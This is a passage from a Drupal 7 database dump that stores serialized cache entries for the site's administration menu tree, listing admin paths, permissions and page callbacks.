form\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:71:\"Create a system contact form and set up categories for the form to use.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659147,1),('links:management:tree-data:en:02d010e606602a8513e573e2dff3ed989ad30c286314413351fff4687e765a7b','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:32;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"32\";s:4:\"plid\";s:1:\"9\";s:9:\"link_path\";s:21:\"admin/content/comment\";s:11:\"router_path\";s:21:\"admin/content/comment\";s:10:\"link_title\";s:8:\"Comments\";s:7:\"options\";s:109:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:59:\"List and edit site comments and the comment approval queue.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:2:\"32\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer comments\";}\";s:13:\"page_callback\";s:13:\"comment_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:13:\"admin/content\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:8:\"Comments\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"134\";s:11:\"description\";s:59:\"List and edit site comments and the comment approval queue.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:34;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"34\";s:4:\"plid\";s:1:\"9\";s:9:\"link_path\";s:18:\"admin/content/node\";s:11:\"router_path\";s:18:\"admin/content/node\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:2:\"34\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:13:\"admin/content\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration 